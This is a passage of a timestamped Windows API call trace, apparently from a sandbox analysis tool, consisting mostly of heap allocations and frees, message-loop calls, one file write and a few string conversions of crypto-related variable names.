1 [0204.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0204.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0204.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0204.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0204.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0204.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0204.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0204.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0204.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0204.895] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0204.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0204.895] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0204.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0204.895] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0204.895] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0204.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0204.895] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0204.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0204.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0204.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0204.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0204.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0204.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0204.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0204.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0204.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x150f8) returned 0x2eaa530 [0204.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0204.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0204.896] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x150f8) returned 0x2ed4730 [0204.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0204.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0204.898] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2eaa530 | out: hHeap=0x970000) returned 1 [0204.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0204.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0204.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0204.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0204.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0204.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x150f8) returned 0x2eaa530 [0204.902] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ed4730 | out: hHeap=0x970000) returned 1 [0204.903] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0204.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0204.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x150f8) returned 0x2ed4730 [0204.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2eaa530 | out: hHeap=0x970000) returned 1 [0205.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0205.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0205.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0205.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0205.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0205.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0205.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0205.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0205.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0205.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0205.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0205.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f98 | out: hHeap=0x970000) returned 1 [0205.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0205.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977de8 | out: hHeap=0x970000) returned 1 [0205.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0205.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0205.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0205.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0205.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0205.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0205.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0205.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0205.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0205.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0205.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0205.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0205.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0205.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0205.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0205.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0205.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0205.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0205.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0205.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e95430 | out: hHeap=0x970000) returned 1 [0205.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0205.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0205.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0205.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0205.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0205.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0205.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0205.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0205.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0205.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0205.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0205.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0205.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0205.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0205.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0205.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0205.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0205.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0205.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0205.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0205.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0205.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0205.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0205.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ebf630 | out: hHeap=0x970000) returned 1 [0205.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0205.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0205.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0205.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0205.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0205.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0205.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0205.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0205.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0205.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0205.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0205.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24018 | out: hHeap=0x970000) returned 1 [0205.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0205.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0205.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0205.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0205.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0205.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0205.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0205.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f39118 | out: hHeap=0x970000) returned 1 [0205.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0205.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0205.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x150f8) returned 0x2f24018 [0205.027] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ed4730 | out: hHeap=0x970000) returned 1 [0205.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0205.030] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0205.030] TranslateMessage (lpMsg=0x8cf708) returned 0 [0205.030] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0205.030] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0205.030] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0205.030] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0205.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0205.030] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0205.030] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.030] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0205.031] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0205.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0205.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0205.031] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0205.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0205.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0205.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0205.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x150f8) returned 0x2f39118 [0205.033] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0205.033] WriteFile (in: hFile=0x2d0, lpBuffer=0x2f39118*, nNumberOfBytesToWrite=0x150f8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f39118*, lpNumberOfBytesWritten=0x8cf5e4*=0x150f8, lpOverlapped=0x0) returned 1 [0205.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0205.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f39118 | out: hHeap=0x970000) returned 1 [0205.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0205.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0205.036] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0205.036] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0205.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0205.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0205.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0205.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0205.037] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0205.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0205.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0205.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0205.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0205.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0205.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0205.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0205.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0205.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0205.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50440 [0205.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0205.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0205.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0205.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0205.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505c0 [0205.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0205.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0205.037] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0205.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0205.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0205.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0205.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54dd8 [0205.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0205.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0205.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0205.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0205.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50920 [0205.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0205.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0205.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0205.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0205.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0205.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0205.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0205.038] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0205.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0205.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0205.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0205.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0205.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0205.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0205.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0205.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0205.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0205.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0205.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0205.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0205.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0205.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0205.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0205.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fea0 [0205.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0205.039] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0205.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fea0 | out: hHeap=0x970000) returned 1 [0205.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0205.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50890 [0205.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0205.039] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0205.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0205.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0205.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0205.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0205.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0205.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0205.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0205.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0205.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0205.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0205.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0205.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0205.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0205.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0205.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0205.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0205.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0205.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 